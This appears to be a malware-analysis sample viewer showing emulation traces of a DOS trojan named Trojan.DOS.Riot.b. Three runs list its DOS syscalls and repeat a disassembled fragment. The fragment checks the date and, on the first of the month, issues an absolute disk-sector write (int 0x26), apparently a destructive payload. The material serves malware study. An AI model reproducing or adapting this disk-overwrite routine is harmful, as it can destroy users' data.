Sample viewer

vx.netlux.org/Trojan.DOS.Riot.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:35:33.478951311Z 51 PC: 12a5b | Get or set Ctrl-Break
2018-12-17T22:35:33.480572354Z 51 PC: 12a63 | Get or set Ctrl-Break
2018-12-17T22:35:33.481402006Z 53 PC: 12a68 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:35:33.482467933Z 37 PC: 12a74 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:35:33.484638929Z 26 PC: 12a7c | Set disk transfer address
2018-12-17T22:35:33.485708925Z 59 PC: 12a9e | Change current directory
2018-12-17T22:35:33.489721019Z 87 PC: 12aa5 | Get or set file date and time
2018-12-17T22:35:33.497206544Z 62 PC: 12aa9 | Close file
2018-12-17T22:35:33.498723938Z 42 PC: 12ab2 | Get date 0x12ab2: cmp dl, 1
0x12ab5: je 0x12ab9
0x12ab7: jmp 0x12ad6
0x12ab9: cli
0x12aba: mov ah, 2
0x12abc: cdq
0x12abd: mov cx, 0x100
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
0x12ac4: mov al, 3
0x12ac6: mov cx, 0x700
0x12ac9: mov dx, 0
0x12acc: mov ds, word ptr [di + 0x99]
0x12ad0: mov bx, word ptr [di + 0x55]
0x12ad3: call 0x22ab9
0x12ad6: mov dx, word ptr [bp + 0x1b6]
0x12ada: mov ax, 0x4301
0x12add: int 0x21
0x12adf: ret
0x12ae0: mov ax, 0x4200
2018-12-17T22:35:33.500986324Z 67 PC: 12adf | Get or set file attributes

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6407,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:18.145835432Z 51 PC: 12a5b | Get or set Ctrl-Break
2018-12-25T11:59:18.147127826Z 51 PC: 12a63 | Get or set Ctrl-Break
2018-12-25T11:59:18.148005285Z 53 PC: 12a68 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:18.150039489Z 37 PC: 12a74 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:18.15236697Z 26 PC: 12a7c | Set disk transfer address
2018-12-25T11:59:18.165476893Z 59 PC: 12a9e | Change current directory
2018-12-25T11:59:18.169318838Z 87 PC: 12aa5 | Get or set file date and time
2018-12-25T11:59:18.171081631Z 62 PC: 12aa9 | Close file
2018-12-25T11:59:18.172775774Z 42 PC: 12ab2 | Get date 0x12ab2: cmp dl, 1
0x12ab5: je 0x12ab9
0x12ab7: jmp 0x12ad6
0x12ab9: cli
0x12aba: mov ah, 2
0x12abc: cdq
0x12abd: mov cx, 0x100
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
0x12ac4: mov al, 3
0x12ac6: mov cx, 0x700
0x12ac9: mov dx, 0
0x12acc: mov ds, word ptr [di + 0x99]
0x12ad0: mov bx, word ptr [di + 0x55]
0x12ad3: call 0x22ab9
0x12ad6: mov dx, word ptr [bp + 0x1b6]
0x12ada: mov ax, 0x4301
0x12add: int 0x21
0x12adf: ret
0x12ae0: mov ax, 0x4200

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6407,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:18.794436329Z 51 PC: 12a5b | Get or set Ctrl-Break
2018-12-25T11:59:18.795891088Z 51 PC: 12a63 | Get or set Ctrl-Break
2018-12-25T11:59:18.796709278Z 53 PC: 12a68 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:18.797648441Z 37 PC: 12a74 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:18.799346507Z 26 PC: 12a7c | Set disk transfer address
2018-12-25T11:59:18.800517126Z 59 PC: 12a9e | Change current directory
2018-12-25T11:59:18.804472814Z 87 PC: 12aa5 | Get or set file date and time
2018-12-25T11:59:18.806282893Z 62 PC: 12aa9 | Close file
2018-12-25T11:59:18.807654477Z 42 PC: 12ab2 | Get date 0x12ab2: cmp dl, 1
0x12ab5: je 0x12ab9
0x12ab7: jmp 0x12ad6
0x12ab9: cli
0x12aba: mov ah, 2
0x12abc: cdq
0x12abd: mov cx, 0x100
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
0x12ac4: mov al, 3
0x12ac6: mov cx, 0x700
0x12ac9: mov dx, 0
0x12acc: mov ds, word ptr [di + 0x99]
0x12ad0: mov bx, word ptr [di + 0x55]
0x12ad3: call 0x22ab9
0x12ad6: mov dx, word ptr [bp + 0x1b6]
0x12ada: mov ax, 0x4301
0x12add: int 0x21
0x12adf: ret
0x12ae0: mov ax, 0x4200
2018-12-25T11:59:18.809644543Z 67 PC: 12adf | Get or set file attributes